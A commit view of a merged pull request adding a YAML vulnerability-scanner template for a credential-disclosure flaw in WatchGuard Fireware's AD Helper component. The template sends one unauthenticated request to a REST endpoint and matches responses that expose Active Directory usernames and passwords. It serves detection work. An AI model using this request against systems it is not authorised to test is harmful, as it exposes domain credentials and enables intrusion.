Merge pull request #3303 from gy741/rule-add-v77

Create watchguard-fireware-ad-helper-component-credentials-disclosure
patch-1
Prince Chaddha 2021-12-09 21:08:29 +05:30 committed by GitHub
commit f8942668e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: watchguard-credentials-disclosure
info:
name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
author: gy741
severity: critical
description: A credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
reference:
- https://www.exploit-db.com/exploits/48203
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
tags: watchguard,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"fullyQualifiedName"'
- '"logonDomain"'
- '"username"'
- '"password"'
condition: and
- type: status
status:
- 200